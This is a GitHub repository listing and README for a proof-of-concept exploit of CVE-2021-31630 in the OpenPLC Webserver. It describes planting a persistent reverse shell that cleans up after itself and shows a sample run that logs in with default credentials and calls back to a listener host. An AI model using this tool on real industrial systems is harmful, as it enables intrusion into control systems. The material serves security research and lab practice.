https://github.com/thewhiteh4t/cve-2021-31630

Python script for exploiting command injection in Open PLC Webserver v3
https://github.com/thewhiteh4t/cve-2021-31630

cve exploit openplc rce

Last synced: 20 days ago
JSON representation

Python script for exploiting command injection in Open PLC Webserver v3

• Host: GitHub
• URL: https://github.com/thewhiteh4t/cve-2021-31630
• Owner: thewhiteh4t
• Created: 2024-03-28T21:31:45.000Z (about 1 year ago)
• Default Branch: main
• Last Pushed: 2024-07-12T00:16:13.000Z (10 months ago)
• Last Synced: 2025-03-26T17:22:14.895Z (about 1 month ago)
• Topics: cve, exploit, openplc, rce
• Language: Python
• Homepage:
• Size: 3.91 KB
• Stars: 18
• Watchers: 2
• Forks: 4
• Open Issues: 2
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        
# cve-2021-31630

## OpenPLC WebServer v3 - Authenticated RCE

This PoC script is based on the exploit provided by [Fellipe Oliveira](https://packetstormsecurity.com/files/162563/OpenPLC-WebServer-3-Remote-Code-Execution.html).

### Features :

- Directly uploads C code to `/hardware` instead of `st` file upload

- Restores default program before uploading reverse shell

- Improved C based reverse shell which is **non blocking** so web server doesn't hang `;)`

- Spawns shell in the background, works even after PLC is stopped until exit

- Cleanup

```

$ python cve_2021_31630.py -lh 10.10.16.68 -lp 4444 http://10.10.11.7:8080

------------------------------------------------

--- CVE-2021-31630 -----------------------------

--- OpenPLC WebServer v3 - Authenticated RCE ---

------------------------------------------------

[>] Found By : Fellipe Oliveira

[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]

[>] Target   : http://10.10.11.7:8080

[>] Username : openplc

[>] Password : openplc

[>] Timeout  : 20 secs

[>] LHOST    : 10.10.16.68

[>] LPORT    : 4444

[!] Checking status...

[+] Service is Online!

[!] Logging in...

[+] Logged in!

[!] Restoring default program...

[+] PLC Stopped!

[+] Cleanup successful!

[!] Uploading payload...

[+] Payload uploaded!

[+] Waiting for 5 seconds...

[+] Compilation successful!

[!] Starting PLC...

[+] PLC Started! Check listener...

[!] Cleaning up...

[+] PLC Stopped!

[+] Cleanup successful!

```

### Dependencies

```

pip3 install requests

```

### Usage

```

usage: cve_2021_31630.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:

  url         Target URL with http(s)://

options:

  -h, --help  show this help message and exit

  -u U        Username

  -p P        Password

  -t T        Request Timeout, increase if server is slow

  -lh LH      LHOST

  -lp LP      LPORT

```